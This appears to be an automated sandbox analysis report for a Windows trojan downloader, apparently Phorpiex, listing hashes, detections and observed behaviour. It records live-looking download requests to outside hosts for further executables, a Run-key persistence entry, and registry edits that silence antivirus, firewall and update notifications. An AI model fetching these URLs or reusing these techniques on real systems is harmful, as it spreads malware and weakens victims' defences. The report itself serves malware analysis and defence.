Summary | ZeroBOX

tpeinf.exe

Generic Malware, UPX, Downloader, Admin Tool (Sysinternals etc ...), Malicious Library, Malicious Packer, PE File, PE32
Category FILE
Machine s1_win7_x6401
Started July 16, 2024, 11 a.m.
Completed July 16, 2024, 11:02 a.m.
Size 6.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cfb7fbf1d4b077a0e74ed6e9aab650a8
SHA256 d93add71a451ec7c04c99185ae669e59fb866eb38f463e9425044981ed1bcae0
CRC32 174C8FCF
ssdeep 96:An2ZBONNkv90S32BOl7LN8cVHH/PtboynuYUBPCtL:An3NNazCE7dfP1oynfUBe
Yara
  • Network_Downloader - File Downloader
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
packer Armadillo v1.71
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/1
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/2
request GET http://twizt.net/newtpp.exe
request GET http://twizt.net/peinstall.php
request GET http://185.215.113.66/1
request GET http://185.215.113.66/2
description sysmablsvr.exe tried to sleep 183 seconds, actually delayed analysis time by 183 seconds
file C:\Users\test22\AppData\Local\Temp\1737930154.exe
file C:\Users\test22\AppData\Local\Temp\1866818480.exe
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000002c0
filepath: C:\Users\test22\AppData\Local\Temp\33573537.jpg
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\33573537.jpg
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000370
filepath: C:\Users\test22\tbtnds.dat
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\tbtnds.dat
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\1866818480.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $m«qj)Ê9)Ê9)Ê9 ²•9.Ê9Q¸8+Ê9êÅB9+Ê9êÅ@9(Ê9êÅ9+Ê9 r9-Ê9)Ê9éÊ9 d9<Ê9 ²œ9-Ê9 ²›95Ê9 ²Ž9(Ê9Rich)Ê9
request_handle: 0x00cc000c
1 1 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings reg_value C:\Windows\sysmablsvr.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
process tpeinf.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
process tpeinf.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
process sysmablsvr.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
file C:\Windows\sysmablsvr.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\1737930154.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\1866818480.exe:Zone.Identifier
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description attempts to disable windows update notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
service wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start)
service BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start)
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Tiny.a!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.Generic.xt
Cylance Unsafe
VIPRE Gen:Heur.Mint.Zard.11
Sangfor Downloader.Win32.Agent.V1z7
K7AntiVirus Trojan ( 005a7a411 )
BitDefender Gen:Heur.Mint.Zard.11
K7GW Trojan ( 005a7a411 )
Cybereason malicious.1d4b07
Arcabit Trojan.Mint.Zard.11
VirIT Trojan.Win32.Genus.OHA
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Tiny.NTO
APEX Malicious
McAfee GenericRXAA-FA!CFB7FBF1D4B0
Avast Win32:Evo-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.Win32.Convagent.gen
Alibaba TrojanDownloader:Win32/Generic.4ef83f0b
NANO-Antivirus Trojan.Win32.Tiny.jvzevg
MicroWorld-eScan Gen:Heur.Mint.Zard.11
Rising Downloader.Agent!1.F26F (CLASSIC)
Emsisoft Gen:Heur.Mint.Zard.11 (B)
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.DownLoader.origin
Zillya Downloader.Tiny.Win32.25607
TrendMicro Mal_DLDER
McAfeeD Real Protect-LS!CFB7FBF1D4B0
FireEye Generic.mg.cfb7fbf1d4b077a0
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Tiny
Webroot W32.Trojan.Gen
Google Detected
Avira TR/Crypt.XPACK.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan[Downloader]/Win32.Tiny
Kingsoft malware.kb.a.1000
Xcitium Malware@#39haopuw30io5
Microsoft Trojan:Win32/Phorpiex.RB!MTB
ZoneAlarm HEUR:Trojan-Downloader.Win32.Convagent.gen
GData Gen:Heur.Mint.Zard.11
AhnLab-V3 Trojan/Win.Dlder.C5394644
BitDefenderTheta AI:Packer.46101D181F
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Caynamer
Malwarebytes Generic.Malware/Suspicious
Panda Trj/GdSda.A
TrendMicro-HouseCall Mal_DLDER